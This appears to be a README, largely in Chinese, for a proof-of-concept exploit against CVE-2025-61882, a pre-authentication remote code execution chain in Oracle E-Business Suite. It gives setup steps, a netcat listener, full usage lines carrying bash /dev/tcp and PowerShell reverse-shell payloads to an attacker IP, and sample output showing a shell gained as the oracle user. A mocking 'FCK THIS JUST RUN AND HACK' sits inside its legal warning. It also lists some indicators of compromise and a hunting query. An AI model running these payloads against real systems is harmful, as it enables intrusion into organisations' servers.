技术详情请参阅我们的博客文章
本工具仅用于经授权的安全测试
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨 ║
║ ║
║ By using this tool, you acknowledge and agree that: ║
║ ║
║ ║
║ FCK THIS JUST RUN AND HACK ║
║ ║
║ ║
║ ║
║ ║
║ ║
╚══════════════════════════════════════════════════════════════╝
针对 CVE-2025-61882 的安全测试工具,这是一个影响 Oracle E-Business Suite 的严重预认证远程代码执行漏洞。
创建者: Mindflare
CVE-2025-61882 是一条复杂的利用链,组合了五个不同的漏洞:
/OA_HTML/configurator/UiServlet 进行服务端请求伪造return_url 参数中进行 HTTP 头注入/OA_HTML/help/../ 前缀进行路径遍历# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# Install dependencies
pip3 install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
在单独的终端中启动 netcat 监听器:
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
基本用法(Linux 目标):
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
Windows 目标:
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
网络 IOC:
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
HTTP 特征:
POST /OA_HTML/configurator/UiServletPOST /OA_HTML/SyncServletGET /OA_HTML/help/../*.jspMIT 许可证,附带教育用途限制 - 请参阅 LICENSE
免责声明: 本软件仅用于经授权的安全测试。未经授权访问计算机系统是违法的。作者不对滥用行为承担任何责任。
**Created by:** Mindflare | **Last Updated:** October 2025
| 参数 | 描述 | 是否必需 | 示例 |
|---|
--target | 目标 Oracle EBS URL | 是 | http://192.168.1.22:8000 |
--lhost | 您的 IP 地址(用于回调) | 是 | 192.168.1.10 |
--lport | HTTP 服务器端口(用于提供 XSL 载荷) | 是 | 80 或 8080 |
--command | 在目标上执行的命令 | 是 | 见上面的示例 |
--platform | 目标操作系统:linux 或 windows | 是 | linux |